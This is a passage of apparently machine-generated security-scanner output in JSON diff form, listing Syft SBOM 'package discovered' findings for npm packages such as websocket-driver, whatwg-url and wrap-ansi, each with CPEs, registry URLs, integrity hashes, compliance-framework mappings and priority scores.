"cpe:2.3:a:vite-compatible-readable:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:vite-compatible-readable:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:vite_compatible_readable:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:vite_compatible_readable:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:vite-compatible:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:vite-compatible:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:vite_compatible:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:vite_compatible:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:vite:vite-compatible-readable-stream:3.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:vite:vite_compatible_readable_stream:3.6.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/vite-compatible-readable-stream@3.6.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/vite-compatible-readable-stream/-/vite-compatible-readable-stream-3.6.1.tgz", + "integrity": "sha512-t20zYkrSf868+j/p31cRIGN28Phrjm3nRSLR2fyc2tiWi4cZGVdv68yNlwnIINTkMTmPoMiSlc0OadaO7DXZaQ==", + "dependencies": { + "inherits": "^2.0.3", + "string_decoder": "^1.1.1", + "util-deprecate": "^1.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c6d0b110f80cc969", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: webidl-conversions 3.0.1", + "title": "webidl-conversions 3.0.1", + "description": "Package discovered: webidl-conversions 3.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "770e2f7ad3b1c524", + "name": "webidl-conversions", + "version": "3.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-2-Clause", + "spdxExpression": "BSD-2-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:webidl-conversions:webidl-conversions:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:webidl-conversions:webidl_conversions:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:webidl_conversions:webidl-conversions:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:webidl_conversions:webidl_conversions:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:webidl:webidl-conversions:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:webidl:webidl_conversions:3.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/webidl-conversions@3.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c76cb0d14c517e35", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: websocket-driver 0.7.4", + "title": "websocket-driver 0.7.4", + "description": "Package discovered: websocket-driver 0.7.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "944bd0667b1458ca", + "name": "websocket-driver", + "version": "0.7.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:websocket-driver:websocket-driver:0.7.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:websocket-driver:websocket_driver:0.7.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:websocket_driver:websocket-driver:0.7.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:websocket_driver:websocket_driver:0.7.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:websocket:websocket-driver:0.7.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:websocket:websocket_driver:0.7.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/websocket-driver@0.7.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/websocket-driver/-/websocket-driver-0.7.4.tgz", + "integrity": "sha512-b17KeDIQVjvb0ssuSDF2cYXSg2iztliJ4B9WdsuB6J952qCPKmnVq4DyW5motImXHDC1cBT/1UezrJVsKw5zjg==", + "dependencies": { + "http-parser-js": ">=0.5.1", + "safe-buffer": ">=5.1.0", + "websocket-extensions": ">=0.1.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "bb5b0fea2c384fe7", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: websocket-extensions 0.1.4", + "title": "websocket-extensions 0.1.4", + "description": "Package discovered: websocket-extensions 0.1.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "6844e064384011a8", + "name": "websocket-extensions", + "version": "0.1.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:websocket-extensions_project:websocket-extensions:0.1.4:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/websocket-extensions@0.1.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/websocket-extensions/-/websocket-extensions-0.1.4.tgz", + "integrity": "sha512-OqedPIGOfsDlo31UNwYbCFMSaO9m9G/0faIHj5/dZFDMFqPTcx6UwqyOy3COEaEOg/9VsGIpdqn62W5KhoKSpg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c0ee8f2bbf5fd4e3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: whatwg-url 5.0.0", + "title": "whatwg-url 5.0.0", + "description": "Package discovered: whatwg-url 5.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0827d54a7a5ea1e5", + "name": "whatwg-url", + "version": "5.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:whatwg-url:whatwg-url:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:whatwg-url:whatwg_url:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:whatwg_url:whatwg-url:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:whatwg_url:whatwg_url:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:whatwg:whatwg-url:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:whatwg:whatwg_url:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/whatwg-url@5.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "dependencies": { + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "10cad46c067a700f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: which 2.0.2", + "title": "which 2.0.2", + "description": "Package discovered: which 2.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "414763db2a64d1aa", + "name": "which", + "version": "2.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:which:which:2.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/which@2.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", + "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", + "dependencies": { + "isexe": "^2.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "20ac7377e7b68a5f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: which-module 2.0.1", + "title": "which-module 2.0.1", + "description": "Package discovered: which-module 2.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e9c9cc83bf436fd2", + "name": "which-module", + "version": "2.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:which-module:which-module:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:which-module:which_module:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:which_module:which-module:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:which_module:which_module:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:which:which-module:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:which:which_module:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/which-module@2.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/which-module/-/which-module-2.0.1.tgz", + "integrity": "sha512-iBdZ57RDvnOR9AGBhML2vFZf7h8vmBjhoaZqODJBFWHVtKkDmKuHai3cx5PgVMrX5YDNp27AofYbAwctSS+vhQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9ffab25d563bb6a3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: wrap-ansi 6.2.0", + "title": "wrap-ansi 6.2.0", + "description": "Package discovered: wrap-ansi 6.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "1fadca0371d5cfaf", + "name": "wrap-ansi", + "version": "6.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:wrap-ansi:wrap-ansi:6.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:wrap-ansi:wrap_ansi:6.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:wrap_ansi:wrap-ansi:6.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:wrap_ansi:wrap_ansi:6.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:wrap:wrap-ansi:6.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:wrap:wrap_ansi:6.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/wrap-ansi@6.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-6.2.0.tgz", + "integrity": "sha512-r6lPcBGxZXlIcymEu7InxDMhdW0KDxpLgoFLcguasxCaJ/SOIZwINatK9KY/tf+ZrlywOKU0UDj3ATXUBfxJXA==", + "dependencies": { + "ansi-styles": "^4.0.0", + "string-width": "^4.1.0", + "strip-ansi": "^6.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8455272704618757", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: wrap-ansi 7.0.0", + "title": "wrap-ansi 7.0.0", + "description": "Package discovered: wrap-ansi 7.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "336621830c576ca4", + "name": "wrap-ansi", + "version": "7.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": 